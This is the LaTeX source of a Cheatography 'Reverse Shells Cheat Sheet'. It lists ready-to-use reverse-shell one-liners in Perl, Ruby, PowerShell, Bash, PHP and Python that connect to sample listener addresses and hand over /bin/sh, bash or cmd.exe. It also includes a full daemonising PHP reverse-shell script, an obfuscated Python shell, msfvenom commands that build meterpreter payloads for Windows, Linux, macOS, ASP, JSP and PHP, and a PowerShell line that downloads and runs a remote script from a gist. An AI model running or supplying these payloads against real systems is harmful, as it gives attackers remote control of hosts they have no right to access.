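% Preamble of the Cheatography export "Reverse Shells Cheat Sheet" (author: pat0pau).
% Every declaration sits on its own line: a `%` comment runs to the end of the
% physical line, so a declaration that shares a line with an earlier comment is
% never executed.
\documentclass[10pt,a4paper]{article}

% Packages
\usepackage{fancyhdr} % For header and footer
\usepackage{multicol} % Allows multicols in tables
\usepackage{tabularx} % Intelligent column widths
\usepackage{tabulary} % Used in header and footer
\usepackage{hhline} % Border under tables
\usepackage{graphicx} % For images
\usepackage{xcolor} % For hex colours
%\usepackage[utf8x]{inputenc} % For unicode character support
\usepackage[T1]{fontenc} % Without this we get weird character replacements
\usepackage{colortbl} % For coloured tables
\usepackage{setspace} % For line height
\usepackage{lastpage} % Needed for total page number
\usepackage{seqsplit} % Splits long words.
%\usepackage{opensans} % Can't make this work so far. Shame. Would be lovely.
\usepackage[normalem]{ulem} % For underlining links

% Most of the following are not required for the majority
% of cheat sheets but are needed for some symbol support.
\usepackage{amsmath} % Symbols
\usepackage{MnSymbol} % Symbols
\usepackage{wasysym} % Symbols
%\usepackage[english,german,french,spanish,italian]{babel} % Languages

% Document Info
\author{pat0pau}
% \pdfinfo is a pdfTeX primitive; it writes the PDF metadata fields listed here.
\pdfinfo{
  /Title (reverse-shells.pdf)
  /Creator (Cheatography)
  /Author (pat0pau)
  /Subject (Reverse Shells Cheat Sheet)
}

% Lengths and widths
\addtolength{\textwidth}{6cm}
\addtolength{\textheight}{-1cm}
\addtolength{\hoffset}{-3cm}
\addtolength{\voffset}{-2cm}
\setlength{\tabcolsep}{0.2cm} % Space between columns
\setlength{\headsep}{-12pt} % Reduce space between header and content
\setlength{\headheight}{85pt} % If less, LaTeX automatically increases it
\renewcommand{\footrulewidth}{0pt} % Remove footer line
\renewcommand{\headrulewidth}{0pt} % Remove header line
\renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit

% These two commands together give roughly
% the right line height in the tables
\renewcommand{\arraystretch}{1.3}
\onehalfspacing

% Commands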
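\newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour; stores the name globally in \RowColorName
\newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols; reuses the colour set by \SetRowColor
\newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns
\newcommand{\tn}{\tabularnewline} % Required as custom column type in use
%
% Font and Colours
\definecolor{HeadBackground}{HTML}{333333}
\definecolor{FootBackground}{HTML}{666666}
\definecolor{TextColor}{HTML}{333333}
\definecolor{DarkBackground}{HTML}{5360A3}
\definecolor{LightBackground}{HTML}{F4F5F9}
\renewcommand{\familydefault}{\sfdefault}
\color{TextColor}
%
% Header and Footer
\pagestyle{fancy}
\fancyhead{} % Set header to blank
\fancyfoot{} % Set footer to blank
% NOTE(review): the logo below is loaded from an absolute path on the
% generating host; compiling anywhere else presumably needs a local copy of
% that file.
\fancyhead[L]{
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{C}
    \SetRowColor{DarkBackground}
    \vspace{-7pt}
    {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent
        \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}}
    }
\end{tabulary}
\columnbreak
\begin{tabulary}{11cm}{L}
    \vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{Reverse Shells Cheat Sheet}}}} \\
    \normalsize{by \textcolor{DarkBackground}{pat0pau} via \textcolor{DarkBackground}{\uline{cheatography.com/122827/cs/22977/}}}
\end{tabulary}
\end{multicols}}
%
% Footer: three columns (author, sheet status and page count, sponsor).
\fancyfoot[L]{ \footnotesize
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{LL}
  \SetRowColor{FootBackground}
  \mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}} \\
  \vspace{-2pt}pat0pau \\
  \uline{cheatography.com/pat0pau} \\
\end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
  \SetRowColor{FootBackground}
  \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}} \\
  \vspace{-2pt}Not Yet Published.\\
  Updated 24th May, 2020.\\
  Page {\thepage} of \pageref{LastPage}.
\end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
  \SetRowColor{FootBackground}
  \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}} \\
  \SetRowColor{white}
  \vspace{-5pt}
  %\includegraphics[width=48px,height=48px]{dave.jpeg}
  Measure your website readability!\\
  www.readability-score.com
\end{tabulary}
\end{multicols}}
%
\begin{document}
\raggedright
\raggedcolumns
%
% Set font size to small. Switch to any value
% from this page to resize cheat sheet text:
% www.emerson.emory.edu/services/latex/latex_169.html
\footnotesize % Small font.
%
% NOTE(review): the listener values in the rows below (10.0.0.1, 127.0.0.1,
% dead:beef:2::125c; ports 4242, 1337, 8000, 1234) differ from row to row and
% read as sample values, not as one consistent lab setup.
% NOTE(review): for detection engineering, the one-liner rows share one
% command-line shape: an interpreter run with inline code (perl -e, ruby -e,
% php -r, python -c, powershell -c) or a bash /dev/tcp or /dev/udp
% redirection, an outbound connection, and a command interpreter
% (/bin/sh -i, /bin/bash, cmd.exe, iex) fed from that connection.
%
\begin{multicols*}{2}
%
% --- Misc ---
\begin{tabularx}{8.4cm}{x{3.28 cm} x{4.72 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Misc}} \tn
% Row 0
\SetRowColor{LightBackground}
What programs are installed? & for item in \$(echo "nmap nc perl python ruby gcc wget sudo curl"); do which \$item; done` \tn
% Row Count 4 (+ 4)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}
%
% --- Perl ---
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Perl}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{perl -e 'use \seqsplit{Socket;\$i="10.0.0.1";\$p=4242;socket(S},PF\_INET,SOCK\_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr\_in(\$p,inet\_aton(\$i))))\{open(STDIN,"\textgreater{}\&S");open(STDOUT,"\textgreater{}\&S");open(STDERR,"\textgreater{}\&S");exec("/bin/sh -i");\};'} \tn
% Row Count 5 (+ 5)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{perl -MIO -e '\$p=fork;exit,if(\$p);\$c=new \seqsplit{IO::Socket::INET(PeerAddr},"10.0.0.1:4242");STDIN-\textgreater{}fdopen(\$c,r);\$\textasciitilde{}-\textgreater{}fdopen(\$c,w);system\$\_ while\textless{}\textgreater{};'} \tn
% Row Count 8 (+ 3)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{perl -MIO -e '\$c=new \seqsplit{IO::Socket::INET(PeerAddr},"10.0.0.1:4242");STDIN-\textgreater{}fdopen(\$c,r);\$\textasciitilde{}-\textgreater{}fdopen(\$c,w);system\$\_ while\textless{}\textgreater{};'} \tn
% Row Count 11 (+ 3)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
%
% --- ruby ---
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{ruby}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{ruby -rsocket \seqsplit{-e'f=TCPSocket.open("127.0.0.1"}, 1337).to\_i;exec sprintf("/bin/sh -i \textless{}\&\%d \textgreater{}\&\%d 2\textgreater{}\&\%d",f,f,f)'} \tn
% Row Count 3 (+ 3)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{ruby -rsocket -e 'exit if \seqsplit{fork;c=TCPSocket.new("10.0.0.1"},"4242");while(cmd=c.gets);IO.popen(cmd,"r")\{|io|c.print io.read\}end'} \tn
% Row Count 6 (+ 3)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{ruby -rsocket -e \seqsplit{'c=TCPSocket.new("10.0.0.1"},"4242");while(cmd=c.gets);IO.popen(cmd,"r")\{|io|c.print io.read\}end'} \tn
% Row Count 9 (+ 3)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
%
% --- powershell ---
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{powershell}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{\$client = New-Object \seqsplit{System.Net.Sockets.TCPClient("127.0.0.1"},8000);\$stream = \$client.GetStream();{[}byte{[}{]}{]}\$bytes = 0..65535|\%\{0\};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0)\{;\$data = (New-Object -TypeName \seqsplit{System.Text.ASCIIEncoding).GetString(\$bytes},0, \$i);\$sendback = (iex \$data 2\textgreater{}\&1 | Out-String );\$sendback2 = \$sendback + "PS " + (pwd).Path + "\textgreater{} ";\$sendbyte = ({[}text.encoding{]}::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()\};\$client.Close()} \tn
% Row Count 10 (+ 10)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{powershell -nop -c "\$client = New-Object \seqsplit{System.Net.Sockets.TCPClient('127.0.0.1'},1337);\$stream = \$client.GetStream();{[}byte{[}{]}{]}\$bytes = 0..65535|\%\{0\};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0)\{;\$data = (New-Object -TypeName \seqsplit{System.Text.ASCIIEncoding).GetString(\$bytes},0, \$i);\$sendback = (iex \$data 2\textgreater{}\&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '\textgreater{} ';\$sendbyte = ({[}text.encoding{]}::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()\};\$client.Close()"} \tn
% Row Count 21 (+ 11)
% Row 2
% NOTE(review): this row downloads a script from a gist raw URL (pinned to a
% revision hash in the path) and passes it to IEX; the script text is not part
% of this sheet, so what it runs cannot be reviewed from this page.
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{powershell IEX (New-Object \seqsplit{Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')}} \tn
% Row Count 25 (+ 4)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
%
% --- war file ---
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{war file}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{msfvenom -p \seqsplit{java/jsp\_shell\_reverse\_tcp} LHOST=10.0.0.1 LPORT=4242 -f war \textgreater{} reverse.war} \tn
% Row Count 2 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
%
% --- Bash ---
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Bash}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{exec 5\textless{}\textgreater{}/dev/tcp/127.0.0.1/1337 cat \textless{}\&5 | while read line; do \$line 2\textgreater{}\&5 \textgreater{}\&5; done} \tn
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{bash -i \textgreater{}\& /dev/tcp/127.0.0.1/1337 0\textgreater{}\&1} \tn
% Row Count 3 (+ 1)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{0\textless{}\&196;exec 196\textless{}\textgreater{}/dev/tcp/10.0.0.1/4242; sh \textless{}\&196 \textgreater{}\&196 2\textgreater{}\&196} \tn
% Row Count 5 (+ 2)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{sh -i \textgreater{}\& /dev/udp/10.0.0.1/4242 0\textgreater{}\&1} \tn
% Row Count 6 (+ 1)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
%
% --- php ---
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{php}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{php -r \seqsplit{'\$sock=fsockopen("127.0.0.1"},1337);exec("/bin/sh -i \textless{}\&3 \textgreater{}\&3 2\textgreater{}\&3");'} \tn
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{\textless{}?php \seqsplit{set\_time\_limit(0);\$VERSION="1}.0";\$ip='127.0.0.1';\$port=1337;\$chunk\_size=1400;\$write\_a=null;\$error\_a=null;\$shell='uname -a; w; id; /bin/sh -i';\$daemon=0;\$debug=0;if(function\_exists('pcntl\_fork'))\{\$pid=pcntl\_fork();if(\$pid==-1)\{printit("ERROR: Can't fork");exit(1);\}if(\$pid)\{exit(0);\}if(posix\_setsid()==-1)\{printit("Error: Can't setsid()");exit(1);\}\$daemon=1;\}else \{printit("WARNING: Failed to daemonise. This is quite common and not fatal.");\}chdir("/");umask(0);\$sock=fsockopen(\$ip,\$port,\$errno,\$errstr,30);if(!\$sock)\{printit("\$errstr (\$errno)");exit(1);\}\$descriptorspec=array(0=\textgreater{}array("pipe","r"),1=\textgreater{}array("pipe","w"),2=\textgreater{}array("pipe","w"));\$process=proc\_open(\$shell,\$descriptorspec,\$pipes);if(!is\_resource(\$process))\{printit("ERROR: Can't spawn shell");exit(1);\}stream\_set\_blocking(\$pipes{[}0{]},0);stream\_set\_blocking(\$pipes{[}1{]},0);stream\_set\_blocking(\$pipes{[}2{]},0);stream\_set\_blocking(\$sock,0);printit("Successfully opened reverse shell to \$ip:\$port");while(1)\{if(feof(\$sock))\{printit("ERROR: Shell connection terminated");break;\}if(feof(\$pipes{[}1{]}))\{printit("ERROR: Shell process terminated");break;\}\$read\_a=array(\$sock,\$pipes{[}1{]},\$pipes{[}2{]});\$num\_changed\_sockets=stream\_select(\$read\_a,\$write\_a,\$error\_a,null);if(in\_array(\$sock,\$read\_a))\{if(\$debug)printit("SOCK \seqsplit{READ");\$input=fread(\$sock},\$chunk\_size);if(\$debug)printit("SOCK: \$input");fwrite(\$pipes{[}0{]},\$input);\}if(in\_array(\$pipes{[}1{]},\$read\_a))\{if(\$debug)printit("STDOUT READ");\$input=fread(\$pipes{[}1{]},\$chunk\_size);if(\$debug)printit("STDOUT: \$input");fwrite(\$sock,\$input);\}if(in\_array(\$pipes{[}2{]},\$read\_a))\{if(\$debug)printit("STDERR READ");\$input=fread(\$pipes{[}2{]},\$chunk\_size);if(\$debug)printit("STDERR: \$input");fwrite(\$sock,\$input);\}\}fclose(\$sock);fclose(\$pipes{[}0{]});fclose(\$pipes{[}1{]});fclose(\$pipes{[}2{]});proc\_close(\$process);function printit(\$string)\{if(!\$daemon)\{print"\$string\textbackslash{}n";\}\}?\textgreater{}} \tn
% Row Count 39 (+ 37)
\end{tabularx}
\par\addvspace{1.3em}
\vfill
\columnbreak
% --- php (cont) ---
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{php (cont)}} \tn
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{php -r \seqsplit{'\$sock=fsockopen("10.0.0.1"},4242);\$proc=proc\_open("/bin/sh -i", array(0=\textgreater{}\$sock, 1=\textgreater{}\$sock, 2=\textgreater{}\$sock),\$pipes);'} \tn
% Row Count 3 (+ 3)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
%
% --- meterpreter ---
% NOTE(review): rows 4, 5 and 9 generate the same payloads as rows 2, 0 and
% the "war file" table, only under different output file names.
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{meterpreter}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{msfvenom -p \seqsplit{windows/meterpreter/reverse\_tcp} LHOST=10.0.0.1 LPORT=4242 -f exe \textgreater{} reverse.exe} \tn
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{msfvenom -p \seqsplit{windows/shell\_reverse\_tcp} LHOST=10.0.0.1 LPORT=4242 -f exe \textgreater{} reverse.exe} \tn
% Row Count 4 (+ 2)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{msfvenom -p \seqsplit{linux/x86/meterpreter/reverse\_tcp} LHOST=10.0.0.1 LPORT=4242 -f elf \textgreater{}reverse.elf} \tn
% Row Count 6 (+ 2)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{msfvenom -p \seqsplit{linux/x86/shell\_reverse\_tcp} LHOST=10.0.0.1 LPORT=4242 -f elf \textgreater{}reverse.elf} \tn
% Row Count 8 (+ 2)
% Row 4
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{\$ msfvenom -p \seqsplit{linux/x86/meterpreter/reverse\_tcp} LHOST="10.0.0.1" LPORT=4242 -f elf \textgreater{} shell.elf} \tn
% Row Count 10 (+ 2)
% Row 5
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{\$ msfvenom -p \seqsplit{windows/meterpreter/reverse\_tcp} LHOST="10.0.0.1" LPORT=4242 -f exe \textgreater{} shell.exe} \tn
% Row Count 12 (+ 2)
% Row 6
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{\$ msfvenom -p \seqsplit{osx/x86/shell\_reverse\_tcp} LHOST="10.0.0.1" LPORT=4242 -f macho \textgreater{} shell.macho} \tn
% Row Count 14 (+ 2)
% Row 7
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{\$ msfvenom -p \seqsplit{windows/meterpreter/reverse\_tcp} LHOST="10.0.0.1" LPORT=4242 -f asp \textgreater{} shell.asp} \tn
% Row Count 16 (+ 2)
% Row 8
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{\$ msfvenom -p \seqsplit{java/jsp\_shell\_reverse\_tcp} LHOST="10.0.0.1" LPORT=4242 -f raw \textgreater{} shell.jsp} \tn
% Row Count 18 (+ 2)
% Row 9
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{\$ msfvenom -p \seqsplit{java/jsp\_shell\_reverse\_tcp} LHOST="10.0.0.1" LPORT=4242 -f war \textgreater{} shell.war} \tn
% Row Count 20 (+ 2)
% Row 10
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{\$ msfvenom -p cmd/unix/reverse\_python LHOST="10.0.0.1" LPORT=4242 -f raw \textgreater{} shell.py} \tn
% Row Count 22 (+ 2)
% Row 11
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{\$ msfvenom -p cmd/unix/reverse\_bash LHOST="10.0.0.1" LPORT=4242 -f raw \textgreater{} shell.sh} \tn
% Row Count 24 (+ 2)
% Row 12
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{\$ msfvenom -p cmd/unix/reverse\_perl LHOST="10.0.0.1" LPORT=4242 -f raw \textgreater{} shell.pl} \tn
% Row Count 26 (+ 2)
% Row 13
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{\$ msfvenom -p \seqsplit{php/meterpreter\_reverse\_tcp} LHOST="10.0.0.1" LPORT=4242 -f raw \textgreater{} shell.php; cat shell.php | pbcopy \&\& echo '\textless{}?php ' | tr -d '\textbackslash{}n' \textgreater{} shell.php \&\& pbpaste \textgreater{}\textgreater{} shell.php} \tn
% Row Count 30 (+ 4)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
%
% --- Python ---
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Python}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect(("127.0.0.1",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call({[}"/bin/sh","-i"{]});'} \tn
% Row Count 5 (+ 5)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{export RHOST="10.0.0.1";export RPORT=4242;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));{[}os.dup2(s.fileno(),fd) for fd in (0,1,2){]};pty.spawn("/bin/sh")'} \tn
% Row Count 10 (+ 5)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'} \tn
% Row Count 15 (+ 5)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF\_INET6,socket.SOCK\_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'} \tn
% Row Count 20 (+ 5)
% Row 4
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{C:\textbackslash{}Python27\textbackslash{}python.exe -c "(lambda \_\_y, \_\_g, \_\_contextlib: {[}{[}{[}{[}{[}{[}{[}(s.connect(('10.0.0.1', 4242)), {[}{[}{[}(s2p\_thread.start(), {[}{[}(p2s\_thread.start(), (lambda \_\_out: (lambda \_\_ctx: {[}\_\_ctx.\_\_enter\_\_(), \seqsplit{\_\_ctx.\_\_exit\_\_(None}, None, None), \_\_out{[}0{]}(lambda: None){]}{[}2{]})(\_\_contextlib.nested(type('except', (), \{'\_\_enter\_\_': lambda self: None, '\_\_exit\_\_': lambda \_\_self, \_\_exctype, \_\_value, \_\_traceback: \_\_exctype is not None and (issubclass(\_\_exctype, KeyboardInterrupt) and {[}True for \_\_out{[}0{]} in {[}((s.close(), lambda after: after()){[}1{]}){]}{]}{[}0{]})\})(), type('try', (), \{'\_\_enter\_\_': lambda self: None, '\_\_exit\_\_': lambda \_\_self, \_\_exctype, \_\_value, \_\_traceback: {[}False for \_\_out{[}0{]} in {[}((p.wait(), (lambda \_\_after: \_\_after())){[}1{]}){]}{]}{[}0{]}\})())))({[}None{]})){[}1{]} for p2s\_thread.daemon in {[}(True){]}{]}{[}0{]} for \_\_g{[}'p2s\_thread'{]} in {[}(threading.Thread(target=p2s, args={[}s, p{]})){]}{]}{[}0{]}){[}1{]} for s2p\_thread.daemon in {[}(True){]}{]}{[}0{]} for \_\_g{[}'s2p\_thread'{]} in {[}(threading.Thread(target=s2p, args={[}s, p{]})){]}{]}{[}0{]} for \_\_g{[}'p'{]} in {[}(subprocess.Popen({[}'\textbackslash{}\textbackslash{}windows\textbackslash{}\textbackslash{}system32\textbackslash{}\textbackslash{}cmd.exe'{]}, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)){]}{]}{[}0{]}){[}1{]} for \_\_g{[}'s'{]} in {[}(socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)){]}{]}{[}0{]} for \_\_g{[}'p2s'{]}, p2s.\_\_name\_\_ in {[}(lambda s, p: (lambda \_\_l: {[}(lambda \_\_after: \_\_y(lambda \_\_this: lambda: (\_\_l{[}'s'{]}.send(\_\_l{[}'p'{]}.stdout.read(1)), \_\_this()){[}1{]} if True else \_\_after())())(lambda: None) for \_\_l{[}'s'{]}, \_\_l{[}'p'{]} in {[}(s, p){]}{]}{[}0{]})(\{\}), 'p2s'){]}{]}{[}0{]} for \_\_g{[}'s2p'{]}, s2p.\_\_name\_\_ in {[}(lambda s, p: (lambda \_\_l: {[}(lambda \_\_after: \_\_y(lambda \_\_this: lambda: {[}(lambda \_\_after: (\_\_l{[}'p'{]}.stdin.write(\_\_l{[}'data'{]}), \_\_after()){[}1{]} if (len(\_\_l{[}'data'{]}) \textgreater{} 0) else \_\_after())(lambda: \_\_this()) for \_\_l{[}'data'{]} in {[}(\_\_l{[}'s'{]}.recv(1024)){]}{]}{[}0{]} if True else \_\_after())())(lambda: None) for \_\_l{[}'s'{]}, \_\_l{[}'p'{]} in {[}(s, p){]}{]}{[}0{]})(\{\}), 's2p'){]}{]}{[}0{]} for \_\_g{[}'os'{]} in {[}(\_\_import\_\_('os', \_\_g, \_\_g)){]}{]}{[}0{]} for \_\_g{[}'socket'{]} in {[}(\_\_import\_\_('socket', \_\_g, \_\_g)){]}{]}{[}0{]} for \_\_g{[}'subprocess'{]} in {[}(\_\_import\_\_('subprocess', \_\_g, \_\_g)){]}{]}{[}0{]} for \_\_g{[}'threading'{]} in {[}(\_\_import\_\_('threading', \_\_g, \_\_g)){]}{]}{[}0{]})((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), \seqsplit{\_\_import\_\_('contextlib'))"}} \tn
% Row Count 64 (+ 44)
\end{tabularx}
\par\addvspace{1.3em}
\vfill
\columnbreak
% --- Python (cont) ---
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Python (cont)}} \tn
% Row 5
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call({[}"/bin/sh","-i"{]});'} \tn
% Row Count 5 (+ 5)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
%
% That's all folks
\end{multicols*}
%
\end{document}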